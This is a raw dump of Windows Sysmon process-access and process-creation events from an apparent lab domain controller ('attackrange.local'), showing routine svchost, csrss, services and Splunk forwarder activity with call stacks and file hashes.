13:55:53.012{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007072Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.012{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007071Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.012{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007070Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.012{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007069Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.012{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007068Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.012{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007067Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.012{10ACEC4A-853E-5FCF-0A00-000000009101}852912C:\Windows\system32\services.exe{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007066Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.020{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" serviceC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000007338Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.948{10ACEC4A-85EA-5FCF-3001-000000009101}49564728C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007337Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.714{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85EA-5FCF-3001-000000009101}4956C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007336Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.714{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007335Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.714{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007334Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.714{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007333Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.714{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007332Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.714{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007331Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.714{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007330Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.714{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007329Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.714{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85EA-5FCF-3001-000000009101}4956C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007328Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.714{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007327Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.714{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007326Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.714{10ACEC4A-85EA-5FCF-2F01-000000009101}43244828C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{10ACEC4A-85EA-5FCF-3001-000000009101}4956C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007325Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.718{10ACEC4A-85EA-5FCF-3001-000000009101}4956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-85EA-5FCF-2F01-000000009101}4324C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-log 10341000x80000000000000007324Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.714{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85EA-5FCF-2F01-000000009101}4324C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007323Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.714{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007322Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.714{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007321Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.714{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007320Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.714{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007319Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 